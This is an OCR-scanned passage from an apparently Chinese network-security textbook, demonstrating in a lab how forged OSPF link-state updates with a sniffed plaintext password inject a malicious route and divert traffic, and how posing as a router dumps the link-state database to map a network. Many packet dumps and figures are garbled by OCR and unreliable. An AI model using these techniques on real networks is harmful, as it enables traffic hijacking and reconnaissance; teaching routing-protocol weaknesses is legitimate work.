input localhost ipaddr:192.3.3.20 (1) 输入 本 机 IP 
《2》 自动 获得 本 机 EAC 地 址 
(3) 输入 网 关 IP 
《4) 自动 获得 网 关 的 EAC 地址 
Localhost_link_id(localhost network addr):192.3.3.9 《5) 输入 本 地 网 络 地 址 
Localhost_link_data(locathost network mask):255.255.255.9 (6) 输入 子 网 捷 码 
Localhost_tos_metric:1 《〈7)》 输入 本 地 网 络 代价 
Forge_link_id(forge network addr):292.1.1.9 《8) 输入 伪造 的 网 络 地 址 
Forge_link_data(forge network mask) :255.255.255.9(9) 输入 伪造 网 络 的 子 网 捷 码 
Forge_tos_metric:1。(10) 输入 伪造 网 络 的 代价 


| 


图 6-42 依次 输入 指令 开始 攻击 


Hacker 发 送 给 R3 的 包含 伪造 链 路 信息 的 OSPF-LSU 报 文 格式 如 图 6-43 所 示 。 
eg 

C。 接 下 来 20 字 节 为 网 络 层 数据 ,协议 类 型 字段 为 89, 代 表 这 是 一 个 OSPF 报 文 。 
源 IP 地 址 是 黑客 主机 IP, 目 的 IP 地 址 是 R3 在 NET3 的 接口 IP。 最 后 76 字 节 是 
OSPF 数据 ,类 型 为 4, 代表 这 是 一 个 LSU 链 路 更 新 报 文 ( 数 据 链 路 信息 包含 在 这 类 报 
文 之 中 ) 。 路 由 器 的 ID 为 192. 3. 3. 20, 区 域 号 为 0. 0. 0.0。 认 证 方式 为 1, 代表 使 用 简 
单 密码 认证 ,其 后 的 12345678 即 为 认证 密码 。 通 告 个 数 为 1, 代表 这 个 LSU 报 文 中 只 
有 一 

通告 格式 如 图 6-44 所 示 ,其 中 包含 两 条 链 路 信息 。 第 一 条 即 为 伪造 的 链 路 信息 

表示 Hacker 拥有 一 条 到 达 202. 1. 1.0 网 络 的 链 路 ,其 代价 为 1, 类 型 为 ipt 
第 二 条 链 路 信息 表明 ,Hacker 拥有 一 条 到 达 NET3 的 链 路 ,代价 为 1, 类 型 为 3。 

第 五 步 : 验证 攻击 结果 。 

Hacker 伪造 的 数据 链 路 信息 会 随 着 OSPF 协议 扩散 至 整个 内 部 网 络 , 每 台 路 由 器 都 
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LSU 
2 | 4 [ en=76 
router id 一 一 192.3.3.20 
id 0.0.0.0 
| ospf header 
auth type 一 一 | check 1 
1234 
password 
5678 
EL 一 advertisement num 
R3 MAC - 
advertismentl Forge hacker link 48B, 
Hacker MAC 
个 20B 个 
Link data | IPheader 


14B 


图 6-43 ”Hacker 发 送 给 R3 的 LSU 报 文 


optional 
age=1 2 1 |—— route link 
192.3.3.20 -一 link state id 
header 192.3.3.20 -= advertising route 
seq num 
check 48 -一 len 
routertype -一 | 0 0 2 一 router link num 
lnkid- 一 | 202.1.10 
link data -一 255.255.255.0 first link 
subnet network -一 | 3 0 | metric=1l 
| 19233.0 
255.255.255.0 second link 
subnet network -一 | 3 0 metric=1 
SS 
Ss 
NET3 Hacker Forge NET 
subnet network subnet network 


图 6-44 第 一 个 通告 (advertisement) ,描述 Hacker 伪造 的 链 路 状态 
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会 重新 计算 自己 的 路 由 表 ,添加 到 达 202. 1.1.0 网 络 的 路 由 信息 。 图 6-45 一 图 6-47 为 在 
三 台 路 由 器 上 查看 到 的 结果 ,经 验证 与 之 前 的 分 析 一 致 ,每 个 路 由 表 中 都 增加 了 一 条 到 达 
202. 1.1.0 网 络 的 恶意 路 由 。 


二 
EE 


NN 
全 名 
右 扣 


总 癌 芒 惊 尽 员 吕 
忆 岂 凡人 右 


咎 总 总 吕 总 
Labatt 


Wo ono oe 


255. 
255. 
.0 
.0 
. 255. 
255. 
.255. 
192， 255, . 255. 
.255. 
255. 
255. 
.255. 
, 255. 
.0 


o 
o 
oo 


咏 写 局 衣 忆 SB 六 RNR 
ReennRPoopleRonw 
Neosnnneooclononw 
No 


四 


255. 255. 255. 255 。 255. 255. 255. 255 192.2.2.1 1 本 地 
255. 255. 255. 255 。 255. 255. 255. 255 192.1.1.2 1 本 地 
224.0.0.0 240.0.0.0 192.2.2.1 1 本 地 
224.0.0.0 240.0.0.0 192.1.1.2 本 地 
202.1.1.0 255. 255. 255.0 192.2.2.2 4 OSPF HW4 4 R3 
192.3.3.0 255. 255. 255.0 192.2.2.2 3 OSPF 
192.2.2.1 255. 255. 255. 255 127.0.0.1 1 本 地 
192.2.2.0 255. 255. 255.0 192.2.2.1 2 OSPF 
192.2.2.0 255. 255. 255.0 192.2.2.1 1 本 地 
192.1.1.2 255. 255. 255. 255 127.0.0.1 1 本 地 
192.1.1.0 255. 255. 255.0 192.1.1.2 1 OSPF 
192.1.1.0 255. 255. 255.0 192.1.1.2 1 本 地 
127.0.0.1 255. 255. 255. 255 127.0.0.1 1 本 地 
127.0.0.0 255.0.0.0 127.0.0.1 1 本 地 
0.0.0.0 0.0.0.0 192.1.1.1 1 网 络 管理 


255.255.255.255 255.255.255.255 202.1.1.1 1 本 地 
255.255.255.255 255.255.255.255 192.1.1.1 1 本 地 
224.0.0.0 240.0.0.0 202.1.11 1 本 地 
224.0.0.0 240.0.0.0 192.1.11 1 本 地 
202.1.1.1 255. 255. 255. 255 。 127.0.0.1 1 本 地 
202.1.1.0 255.255.255.0 192.1.1.2 5 OSPF WH4 5 B2 
202.1.1.0 255. 255.255.0 202.1.1.1 1 本 地 
192.3.3.0 255.255.255.0 192.1.1.2 4 OSPF 
192.2.2.0 255.255.255.0 192.1.1.2 3 OSPF 
192.1.1.1 255.255.255.255 127.0.0.1 1 本 地 
192.1.1.0 255. 255.255.0 192.111 1 OSPF 
192.1.1.0 255.255.255.0 192.1.11 1 本 地 
127.0.0.1 255. 255. 255.255 127.0.0.1 1 本 地 
127.0.0.0 255.0.0.0 127.0.0.1 1 本 地 


图 6-47 RI1 的 路 由 表 


第 六 步 : Cl 发 出 卫 数 据 报 的 流向 将 被 引 至 Hacker。 

攻击 成 功 之 后 在 Cl1 上 执行 ping 202. 1. 1.1 命令 ,这 时 C1l 会 根据 其 默认 路 由 的 设置 
将 IP 数据 报 传送 给 R2。R2 通过 查找 自己 的 路 由 表 发 现 匹配 表 项 N4-4-R3, 即 发 往 N4 
的 IP 数据 报应 该 传送 给 R3, 于 是 它 向 Cl 发 送 ICMP 重 定向 报 文 ,通知 Cl 添加 到 达 
202.1.1.1 主机 的 路 由 表 项 。 

R2 发 出 的 重 定向 报 文 格式 如 图 6-48 所 示 , 报 文 如 图 6-49 所 示 。 报 文 共 70 字 节 ,前 
14 字 节 是 数据 链 路 层 信 息 , 目 的 MAC 地 址 为 Cl 主机 MAC, 源 MAC 地 址 为 R2 的 
MAC。 接 下 来 20 字 节 是 IP 首部 , 源 IP 地 址 是 R2 在 NET2 的 接口 IP, 目 的 IP 地 址 是 
C1 的 IP, 协 议 类 型 为 1, 代 表 这 是 一 个 ICMP 重 定向 报 文 。 之 后 8 个 字 节 是 ICMP 首部 ， 
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其 中 新 的 网 关 地 址 是 R3 在 NET2 的 接口 卫 。 最 后 28 字 节 数据 取 至 原始 IP 数据 报 的 网 
络 层 数据 (20 字 节 ) 和 传输 层 数据 (8 字 节 ) 。 


CI MAC 1 check 
R2 MAC 192.2.2.2 新 网 关 地 址 
全 20B 个 20B 


Link data forge IP header remainder data 
14B UL 8B 几 8B 
0x45| 00 | length length 
id flag id flag 
TIL| 1 check | check 
源 IP 地 址 192.2.2.1 192.2.2.30 
目的 IP 地 址 192.2.2.30 202.1.1.1 


图 6-48 ”ICMP 重 定向 报 文 的 格式 


C1 的 NAC R2 在 NET2 的 接口 IAC ” 源 IP:192. 2. 2. 1 

00000000: 00 0c 29|5c 7e 7b 00 0c 29|a3 70 45 08|00 45 00 ..)\W{..) E..E 
00000010: 00 38 21 b3 00 00 80 01 94 ee c0 02 02|01 c0 02 .81?.5. 计 ?3..? 
00000020: 02 le 05 01 e3 9d c0 02 02 02 45 00 00 3c 09 56 ..., 犹 ?..,E..《,V 
00000030: 00|00 80 01 a4 48|c0 02 02 le ca 01 01 01 08 00 ..1 证 
00000040: 33|5c 02 00 18 00 yl 3、\ 

目的 IP:192. 2. 2.30 新 网 关 IP:192. 2. 2. 2 原始 数据 报 的 目的 IP:202. 1. 1. 1 

原始 数据 报 的 源 IP:192. 2. 2. 30 


图 6-49 R2 发 送 给 Cl 的 ICMP 重 定向 报 文 


Cl 收 到 从 这 个 ICMP 重 定向 报 文 后 在 自己 的 路 由 表 中 添加 到 达 202. 1.1. 1 的 特定 
主机 路 由 ,如 图 6-50 所 示 。 


Active Routes: 
Network Destination Netmask 


192.2.2.38 


255 .255.. -8 
255.255 .255.255 
255.255 .255.255 
255.255 .255.255 

224-9-9-8 
255.255.255.255 255.255.255.255 
Defal 


新 和 水 加 的 主机 路 由 


| 


图 6-50 主机 Cl 新 添加 的 路 由 


之 后 Cl 发 往 202. 1. 1. 1 的 IP 数据 报 将 传送 给 R3, R3 再 将 这 些 报 文 传送 给 
Hacker。 图 6-51 和 图 6-52 给 出 的 是 IP 数据 报 的 转发 过 程 。 


R3 在 NET2 的 接口 MAC C1 的 MAC 
0000000: 00 0c 29166 07 57 00 0c 29|sc 7e 7b 08 00 45 00 Ch A 
En oY A 


0000010: 00 3c 09 57 00 00 80 01 a4 47 SO 02 02 le ca 01 
0000020: 01 01 08 00 32 5c ss 19 00 61 62|63 64 65 66 ....2\....abcdef 


0000030: 67|68 69 6a 6b 6c 6d|l6e 6f 70 71 72|73 74 75 76 ghijklmopqrstuv| 
0000040: 77|61 62 63 64 65 66|67 68 69 wabcdef gh1i 
目的 IP:202.1.1.1 TIL=128 源 IP:192. 2. 2. 30 


图 6-51 主机 Cl 发 给 R3 的 I 了 PP 数据 报 
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Hacker 的 MAC R35 在 NET3 的 接口 NAC 
00000000: 00 50 56|c0 00 01 00 0c 29]66 07 61 08 00 45 00 .PY?...)f.a.. E. 
00000010: 00 3c 09 57 00 00 ?ft 01 a5 47 c0 02 02 le ca 01 .<.W..1 ? 3? 
00000020: 01 01 08 00 32 Sc|02 00 19 00 61 62|63 64 65 66 ....2\. abcdef 


00000030: 67|68 69 6a bb 6cjled be 6f 70 7?71 72|73 74 75 76 ghijklmopqrstuv 
00000040: 77|61 62 63 64 65|66 67 68 69 Vabcdeftghi 
目的 ITP:202- 1- 1.1 TTL=127 源 IP:192. 2. 2. 30 


图 6-52 R3 转发 给 Hacker 的 IP 数据 报 


6.4 ”基于 数据 链 路 状态 数据 库 的 网 络 拓扑 
绘制 


64.1 区 域内 网 络 拓扑 主动 发 现 方法 


一 台 OSPF 路 由 器 加 入 网 络 之 后 会 与 指定 路 由 器 交换 数据 链 路 信息 ,交换 完成 之 后 
它 就 掌握 了 区 域内 所 有 的 数据 链 路 信息 ,根据 这 些 链 路 信息 路 由 器 应 用 Dijkstra 算法 计 
算出 一 棵 “最 短路 径 树 ”, 进 而 得 到 自己 的 路 由 表 , 同 样 根据 这 些 数据 链 路 信息 也 可 以 绘制 
出 网 络 的 拓扑 结构 。 

绘制 网 络 拓扑 的 关键 是 获得 网 络 所 有 的 数据 链 路 信息 ,我 们 设计 了 一 种 “区 域内 网 络 
拓扑 主动 发 现 方法 ”, 总 体 思 想 是 攻击 者 将 自己 伪装 成 一 台 合 法 的 路 由 器 ,通过 OSPF 协 
议 主动 与 网 络 的 指定 路 由 器 完成 数据 链 路 共享 ,再 根据 获得 的 数据 链 路 信息 绘制 出 网 络 
拓扑 结构 。 这 种 方法 的 主动 权 掌 握 在 攻击 者 手中 ,他 可 以 随时 获取 网 络 的 拓扑 结构 。 同 
时 由 于 没有 引入 新 的 数据 链 路 信息 ,因此 不 会 改变 路 由 表 中 的 信息 。 如 图 6-53 所 示 , 这 
种 方法 可 以 绘制 出 区 域 网 络 area network 的 拓扑 结构 。 


area border router 


outside network area network hacker 


图 6-53 主动 网 络 拓扑 发 现 方法 


642 数据 链 路 类 型 


OSPF 协议 支持 的 数据 链 路 类 型 包括 4 种 : 点 到 点 链 路 (point-to-point) ,传输 网 络 
(transit network) ,终端 网 络 (subnet network) 和 虚 链 路 。 点 到 点 链 路 连接 两 台 路 由 器 ， 


中 间 没 有 任何 主机 或 其 他 路 由 器 。 传 输 网 络 是 一 个 有 几 台 (不 少 于 两 台 ) 路 由 器 与 之 连接 
的 网 络 。 终 端 网 络 是 一 个 只 连接 到 一 台 路 由 器 的 网 络 。 常 用 数据 链 路 类 型 如 图 6-54 
所 示 。 
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终端 网 络 传输 网 络 


routerl router2 
和 


终端 网 络 链 路 点 到 点 链 路 传输 网 络 链 路 一 | 


Touter3 OC 


图 6-54 数据 链 路 类 型 


643 根据 链 路 数据 库 绘 制 网 络 拓扑 


六 六 


终端 网 络 链 路 


下 面 举例 说 明 根据 链 路 数据 库 绘 制 网 络 拓 扑 的 方法 。 图 6-55 给 出 的 是 某 OSPF 区 


域 网 络 的 链 路 状态 数据 库 , 现 根据 该 链 路 数据 库 绘制 出 网 络 
的 拓扑 结构 。 通 过 分 析 可 以 发 现 该 链 路 数据 库 中 包含 两 个 传 
输 网 络 Nl1 和 N3( 连 接 的 路 由 器 个 数 大 于 1) ,三 个 终端 网 络 
N2、N4 和 N5( 只 连接 了 一 台 路 由 器 ) ,两 个 点 到 点 链 路 (R1 
到 R4、R2 到 R5) 。 

先 绘制 第 一 部 分 网 络 ( 图 6-56) ,传输 网 络 N1 上 连接 了 
R1 、R2 和 R3 ,终端 网 络 N2 上 连接 了 R3,N1 和 N2 都 连接 了 
R3 ,因此 可 通过 R3 将 它们 整合 到 一 起 。 

第 二 部 分 网 络 的 绘制 过 程 如 图 6-57 所 示 。N3 上 连接 了 


3 台 路 由 器 R4、R5 和 R6 ,终端 网 络 N5 上 连接 了 R6, 终 端 网 ”图 6-55 链 路 状态 数据 库 


RI NI 5 
R2 NI 7 RS N22 
R3 NI 3 


R2 


(a) 绘制 N1 网 络 


(0) 连接 N1 和 N2 网 络 
图 6-56 绘制 第 一 部 分 网 络 


R1 
RI 
R2 
R2 
R3 
R3 
R4 
R4 
R5 
R5 
R5 
R6 
R6 


Ke 6B 
R3 


N1 
R4 
R5 
N1 
N2 
N1 
N3 
R1 
N4 
R2 
N3 
N5 
N3 


(b) 绘制 N2 网 络 


CUOIPONOONDAPPoU 
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络 N4 上 连接 了 R5,N3 与 N5 网 络 共同 连接 了 R6,N3 与 N4 网 络 共同 连接 了 R5, 因 此 可 
以 将 N3、N4 和 N5 整合 在 一 起 ,形成 第 二 部 分 网 络 。 


R4 
2 
R4 N3 2 和 
R5 N3 5 R6 N5 5 5 
9 
R6 N3 6 证 
5 
R5 


(a) 绘制 N3 网 络 (b) 绘制 N5 网 络 


RS N4 2 | rs; EE Cw) 


(0) 绘制 N4 网 络 (d) 整合 网 络 
图 6-57 绘制 第 二 部 分 网 络 


如 图 6-58 所 示 , 链 路 数据 库 中 存在 两 条 点 到 点 链 路 ,R1 到 R4 代价 为 8、R2 到 R5 代 
价 为 4。 这 两 条 点 到 点 链 路 可 以 将 两 部 分 网 络 整合 成 一 个 完整 的 网 络 , 至 此 网 络 拓扑 绘 
制 完成 ,我 们 得 到 了 网 络 和 路 由 器 的 连接 情况 以 及 每 条 链 路 的 传输 代价 。 


RI R4 
R4 RI 
R2 R5 
R5 R2 


CE 


图 6-58 连接 两 部 分 网 络 ,形成 完整 的 网 络 拓扑 


644 通过 实验 验证 主动 的 网 络 拓扑 绘制 方法 


将 测试 计算 机 接 和 人 目标 网 络 ,实验 目的 是 根据 链 路 数据 信息 绘制 出 目标 网 络 的 拓扑 
结构 。 实 验 流程 大 致 描述 如 下 : 首先 将 测试 计算 机 伪装 成 一 台新 接 入 目标 网 络 的 合法 路 
由 器 ,通过 身份 认证 之 后 ,目标 网 络 的 指定 路 由 器 会 将 完整 的 链 路 状态 数据 库 封装 在 
OSPF-LSU 报 文中 发 送 给 测试 计算 机 ,在 测试 计算 机 上 运行 Sniffer Pro 可 以 捕获 这 一 
LSU 报 文 ,之 后 通过 这 个 LSU 报 文中 携带 的 链 路 状态 数据 库 绘 制 出 完整 的 区 域 网 络 拓 
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扑 结构 。 

在 开始 实验 之 前 , 先 介 绍 一 下 链 路 通告 。 数 据 链 路 信息 被 封装 在 链 路 通告 报 文中 在 
网 络 内 传输 。 链 路 通告 报 文 包 括 5 种 类 型 ,分 别 是 : 路 由 器 通告 ,传输 网 络 通告 ,到 网 络 
的 汇总 通告 ,到 自治 系统 边界 路 由 器 的 汇总 通告 和 外 部 网 络 通告 。 其 中 前 两 种 链 路 通告 
包含 绘制 网 络 拓扑 所 需 的 数据 链 路 信息 ,是 本 文 研究 的 对 象 。 路 由 器 通告 由 路 由 器 发 布 。 
以 图 6-59 为 例 ,routerl 发 布 的 路 由 器 通告 包括 一 个 终端 网 络 链 路 和 一 个 传输 网 络 链 路 ; 
router2 发 布 的 路 由 器 链 路 通告 包括 两 个 传输 网 络 链 路 。 每 个 传输 网 络 都 有 一 台 指 定 路 
由 器 , 它 负责 发 布 传输 网 络 通告 。 图 6-59 中 传输 网 络 1 的 通告 由 routerl 发 布 ,传输 网 络 
2 的 通告 由 router3 发 布 。 


终端 网 络 传输 网 络 2 


router2 


routerl router 


指定 路 由 器 传输 网 络 1 指定 路 由 器 终端 网 络 
图 6-59 网 络 环境 举例 


第 一 步 : 获取 身份 认证 信息 。 

OSPF 路 由 器 只 信任 合法 路 由 器 发 来 的 链 路 状态 通告 ,在 链 路 状态 通告 报 文中 会 携 
带 验 证 密码 ,只 有 密码 正确 ,路 由 器 才 会 信任 这 个 通告 报 文 。 因 此 必须 获得 这 个 验证 密 
码 。 这 可 以 通过 监听 合法 路 由 器 定期 广播 的 HELLO 报 文 获得 。 

图 6-60 是 合法 路 由 器 定期 (例如 每 隔 10s) 发 出 的 HELLO 报 文 。 包 括 14 字 节 链 路 
层 数 据 、20 字 节 IP 首部 数据 .44 字 节 OSPF HELLO 数据 。 在 链 路 层 数据 中 ,目的 MAC 
地 址 为 组 播 地 址 01. 00. 5e. 00. 00. 05 , 源 MAC 地 址 为 指定 路 由 器 MAC。IP 首部 中 源 IP 
地 址 为 指定 路 由 器 IP, 目 的 IP 地 址 为 组 播 地 址 224. 0. 0. 5。 

从 这 个 HELLO 报 文 的 OSPF 头 部 提取 以 下 信息 : router id 为 50. 1. 1. 2(router id 
是 路 由 器 IP 地 址 最 小 的 那个 接口 的 IP) ,area id 为 0. 0. 0. 0( 相 同 区 域 的 路 由 器 具有 相同 
的 area id) ,Auth_type 为 1(0 表示 无 认证 ,1 表示 简单 密码 认证 方式 ,2 表示 MD5 认证 )， 
Auth_data 为 12345678( 即 认证 密码 ) 。 

从 这 个 HELLO 报 文 的 OSPF 数据 部 分 提取 : Network_mask 为 255. 255. 255. 0、 
HELLO_interval 为 10s,Router_priority 代表 优先 级 为 1, Router_dead_interval 为 40s， 
Designated_router 本 区 域 的 指定 路 由 器 IP 为 60. 1. 1. 1,Backup_designated_router 备份 
指定 路 由 器 无 ,邻居 列表 为 空 。 

第 二 步 : 将 测试 主机 伪装 成 合法 路 由 器 接 人 目标 网 络 ,捕获 LSU 报 文 。 

利用 第 一 步 获得 的 认证 信息 ,将 测试 主机 设置 为 一 台 合法 的 路 由 器 接 人 目标 网 络 。 
配置 界面 如 图 6-61 所 示 。 目 标 网 络 地 址 为 60. 1. 1.0 ,测试 主机 的 IP 地 址 为 60. 1. 1. 30， 
区 域 ID 为 0.0.0.0, 路 由 器 优先 级 为 1, 传 输 代价 为 2, 密码 为 12345678 。 


人 1 


2 | len=44 
50.1.1.2 一 一 router id 
0.0.0.0 一 -areaid 
check 1 —— auth type 
L234 } password 
5678 
255.255.255.0 
int=10 2 1 |—— priority 
ospf data 40 一 一 dead interval 
multicast MAC 01.00.5e.00.00.05 60.1.1.1 一 designated 
designated router MAC DR MAC 0.0.0.0 一 一 backup designated 
个 20B 个 
| Link data | IP header OSPF HELLO ] 
UL - 44B 3 
0x45| 0 length 
id flag 
TIL| 89 check 
60.1.1.1 designated router ip 
224.0.0.5 multicast ip 


图 6-60 包含 验证 密码 的 OSPF HELLO 报 文 格式 


OSPF 尾 性 - 本 地 连接 尾 性 
常规 | BaA 邻居 | 高 级 | 


Es! 开放 式 最 短路 径 忧 先 (0sPF) 接 口 


伙 为 此 地 址 启用 0SPF (8): 


| 加 | 
区 域 DE): 0.0.0.0 了 


路 由 器 忧 先 级 人 ) ;| 习 开销 名 ): 下 习 
密码 到 ): ED 

网 络 类 型 
人 广播 组) 

个 点 对 点 四 

个 非 广播 多 址 访问 QINA) (0) 


取消 E5 到 | 


图 6-61 配置 测试 主机 


单 击 * 确 定 ” 按 钮 之 后 ,测试 主机 与 目标 网 络 的 指定 路 由 器 开始 OSPF 通信 过 程 ,在 测 
试 主机 上 运行 Sniffer Pro 将 整个 通信 过 程 产生 的 网 络 数据 捕获 下 来 。 大 概 40s 之 后 停止 
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捕捉 ,从 通信 数据 中 可 以 很 容易 地 找到 指定 路 由 器 发 送 给 测试 主机 的 OSPF-LSU 报 文 ， 
其 中 就 包含 整个 区 域 网 络 的 链 路 状态 数据 库 ( 注 : 如 果 网 络 比 较 庞 大 , 则 可 能 通过 多 个 
LSU 报 文 传递 链 路 数据 库 ) 。 

第 三 步 : 分 析 LSU 报 文 并 绘制 网 络 拓扑 结构 。 

图 6-62 为 本 例 中 指定 路 由 器 发 送 给 测试 主机 的 LSU 报 文 , 类 型 为 4 代表 这 是 一 个 
LSU 报 文 , 其 中 包含 区 域 网 络 内 所 有 的 链 路 信息 。 这 个 LSU 报 文 包含 5 条 链 路 通告 ,下 
面 逐 一 分 析 这 些 通 告 ,并 绘制 出 它们 所 对 应 的 局 部 网 络 拓扑 结构 。 

LSU 


| 


2 | 4 | len=264 


router id 一 一 SQl2 
area id 一 一 0.0.0.0 
ospf header 
auth type 一 一 | check 1 
password | EE | 4 
5678 
5 一 advertisement num 
advertisment1l 
advertisment2 
advertisment3 advertisment 
hack MAC advertisment4 
DR MAC advertisments 
个 20B 
Link data | IPheader 
Fi U 264B 一 
0x45| 0 length 
| id flag 
TIL| 89 check 
| 60411 DRip 
60.1.1.30 hack ip 


图 6-62 指定 路 由 器 发 送 给 测试 主机 的 LSU 报 文 


第 一 个 通告 类 型 为 2, 说 明 这 是 一 个 传输 网 络 通 告 。Advertising router 字段 表明 这 
个 传输 网 络 的 指定 路 由 器 的 ID 为 50. 1.1.3;link state id 字段 表明 指定 路 由 器 在 传输 网 
络 的 接口 卫 为 70.1.1.2。 由 DR 路 由 器 的 接口 IP 为 70.1.1.2, 子 网 掩 码 为 255. 255. 
255.0, 可 以 得 出 该 传输 网 络 地 址 为 70.1.1.0。 网 络 上 连接 了 两 台 路 由 器 ,ID 分 别 为 50. 
1.1.2 和 50.1.1.3。 根 据 这 些 信息 绘制 出 这 个 传输 网 络 的 局 部 拓扑 。 

第 二 个 通告 类 型 为 2, 说 明 这 也 是 一 个 传输 网 络 通告 。DR 路 由 器 的 接口 IP 为 50. 1. 
1.2, 子 网 掩 码 为 255. 255. 255. 0, 可 以 得 出 该 传输 网 络 地 址 为 50. 1. 1.0。 网 络 上 连接 了 
三 台 路 由 器 ,ID 分 别 为 50.1.1.2、50.1.1.3 和 40.1.1.1。 其 中 DR 路 由 器 的 ID 为 50. 1. 
开罗。 
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optional 


age=149 2 2 | 一 network link 
70.1.1.2 一 = link state id interface IP of DR 
header 50.1.13 一 一 advertising route ID of DR 


seq num 


check 2 一 一 len 


network mask 一 一 255.255.255.0 _ 
| 第 一 个 传输 网 络 通告 
attached routerl ID 一 一 50.1.1.3 


attached router2 ID 一 一 50.1.1.2 


ID:S0.1,1:3 


designated router 


ID:50.1.1.2 Interface IP:70.1.1.2 


transit network1 


图 6-63 根据 第 一 个 传输 网 络 通告 绘制 局 部 拓扑 


optional 
age=153 2 2 | -一 network link 
50.1.1.2 一 一 link state id interface IP of DR 
header 50.1.1.2 一 一 advertising route ID of DR 
seq num 
check 36 一 一 ]en 
network mask 一 一 255.255.255.0 第 二 个 传输 网 络 通告 
attached routerl ID 一 一 50.1.1.2 
attached router2 ID 一 一 50.1.1.3 
attached router3 ID 一 一 40.1.1.1 
ID:40.1.1.1 transit network2 ID:50.1.1.3 


designated router Bl R2 


ID:50.1.1.2 
图 6-64 根据 第 二 个 传输 网 络 通告 绘制 局 部 拓扑 


两 个 传输 网 络 都 连接 了 ID 为 50.1.1.2 和 50.1.1.3 的 路 由 器 ,可 以 通过 这 两 台 路 由 
器 将 两 个 传输 网 络 整合 到 一 起 ,如 图 6-65 所 示 。 
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ID:40.1.1.1 transit network2 ID:50.1.1.3 
Pa designated router 
一 二 
"3 50.1.1.0 R3 of 70.1.1.0 


SS Interface IP:70.1.1.2 
Interface IP:50.1.1.2 


designated router 


of 50.1.1.0 transit network1 


ID:50.1.1.2 
图 6-65 将 两 个 传输 网 络 整合 到 一 起 形成 主干 网 络 


第 三 个 通告 的 类 型 为 1, 表 明 这 是 一 个 路 由 器 链 路 通告 ,如 图 6-66 所 示 。 该 路 由 器 的 
ID 为 40. 1. 1.1, 该 通告 包含 两 个 链 路 数据 。 第 一 个 是 终端 网 络 链 路 ,网络 地 址 为 40. 1. 
1.0, 子 网 掩 码 为 255. 255. 255. 0, 度 量 为 2。 第 二 个 是 传输 网 络 链 路 ,该 传输 网 络 DR 路 
由 器 的 接口 IP 为 50.1. 1.2, 该 路 由 器 在 这 个 传输 网 络 的 接口 IP 为 50. 1.1. 1。 


age=154 2 1 |—— route link 
40.1.1.1 —= link state id 
header 40.1.1.1 —= advertising route ID 
seq num 
check 48 — len 
0 0 2 —— router link num 
network number —— 40.1.1.0 
255.255.255.0 first link 
subnet network -一 | 3 0 metric=2 第 三 个 通告 (advertisement) 
IP of DR -一 50.1.1.2 其 router 的 链 跑 状态 
Interface IP link data -一 50.1.1.1 second link 
transit network -一 | 2 0 | metric=2 


ID:40.1.1.1 


transit network 
， Cr ) 


subnet network IP:SO, ll 


IP:50.1.1.2 
designated router 一 二 
图 6-66 根据 第 三 个 路 由 器 通告 绘制 局 部 拓扑 


ID 为 40.1.1.1 的 路 由 器 也 出 现在 主干 网 络 中 ,因此 可 将 第 三 个 路 由 器 通告 所 对 应 
的 局 部 拓扑 加 入 主干 网 络 , 见 图 6-67。 

第 四 个 通告 的 类 型 为 1, 表明 这 是 一 个 路 由 器 链 路 通告 ,如 图 6-68 所 示 。 这 人 台 路 由 器 
的 ID 为 50. 1.1.3。 该 通告 包括 三 个 链 路 : 前 两 个 是 传输 网 络 链 路 ,第 三 个 是 终端 网 络 链 
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ID:40.1.1.1 ID:50.1.1.3 


IP:50.1.1.1 
40.1.1.0 2 
RI1 


IP:50.1.1.2 
~ 


DR of 50.1.1.0 区 


~ 一 
wi R3 DR of70.1.1.0 


~、 


IP:70.1.1.2 


ID:50.1.1.2 
图 6-67 整合 之 后 的 网 络 拓扑 


路 。 第 一 个 链 路 表明 传输 网 络 的 DR 路 由 器 的 IP 地 址 为 50. 1. 1. 2, 该 路 由 器 在 这 个 传输 
网 络 的 接口 IP 为 50.1.1.3, 度 量 值 为 2。 第 二 个 链 路 表明 传输 网 络 的 DR 路 由 器 的 IP 
地 址 为 70. 1. 1. 2, 该 路 由 器 在 这 个 传输 网 络 的 接口 IP 为 70.1.1.2, 说 明 这 台 路 由 器 即 为 
这 个 传输 网 络 的 指定 路 由 器 ,度量 值 为 2。 第 三 个 链 路 表明 终端 网 络 地址 为 80. 1. 1. 0 , 子 
网 掩 码 为 255. 255. 255. 0 ,传输 代价 为 2。 


age=139 1 |— route link 
50.1.1.3 —— link state id 
header [| 50113 | 一 advertising route ID 
seq num 
check 60 — len 
0 0 3 —— router link num 
IPofDR ~ 50112 | 
InterfaceIPlink data ~-| 50113 | first link 
transit network -一 | 2 0 | metric=2 
IPofDR —— [2 | 第 四 个 通告 (advertisement) 
Interface IP link data -一 [| 70112 | Second link 描 玉 rove 的 能 只 状 让 
transit network -一 | 2 0 | metric=2 
network number -一 80110 | 
255.2355:255.0 third link 
subnet network -一 | 3 0 | metric=2 


designated router 


transit network1 ID:50.1.1.3 subnet network 
: = 80.1.1.0 
2 Nw 
IP:50.1.1.3 


IP:50.1.1.2 70.1.1.2 


designated router 


transit network2 


图 6-68 根据 第 四 个 路 由 器 通告 绘制 局 部 拓扑 
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ID 为 50.1.1.3 的 路 由 器 也 出 现在 主干 网 络 中 ,因此 可 将 第 四 个 路 由 器 通告 所 对 应 
的 局 部 拓扑 加 入 主干 网 络 , 见 图 6-69。 


DR of 70.1.1.0 
ID:40.1.1.1 ID:50.1.1.3 
:S01 
40.1.1.0 也 人 80.1.1.0 
R1 


ID:50.1.1.2 
图 6-69 整合 之 后 的 网 络 拓扑 


第 五 个 通告 的 类 型 为 1, 表明 这 是 一 个 路 由 器 链 路 通告 ,如 图 6-70 所 示 。 这 人 台 路 由 咒 


age=140 2 1 |— route link 


S01.12 —— link state id 
header 50.1.1.2 —= advertising route ID 
| 
check 60 —— len 
0 0 多 -一 routerlink num 
IP of DR -一 | 53501412 
Interface IP link data -~ 一 50.1.1.2 first link 


transit network -一 | 2 0 metric=2 
第 五 个 通告 (advertisement) 


network number 一 一 60.1.1.0 描述 router 的 链 路 状态 
255.255.255.0 second link 
subnet network 一 | 3 0 metric=2 
IP of DR -一 70.1.1.2 
Interface IP link data 一 一 70.1.1.1 third link 


transit network -一 | 2 0 metric=1 


NET1(transit) 


DR of NET2 


IP:70.1.1.2 


DR of NETI1 
ID:50.1.1.2 


NET2(transit) 


NET3(subnet) 
图 6-70 根据 第 五 个 路 由 器 通告 绘制 局 部 拓扑 
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的 ID 为 50.1.1.2, 该 通告 包括 三 个 链 路 。 第 一 个 链 路 表明 传输 网 络 的 DR 路 由 器 的 IP 
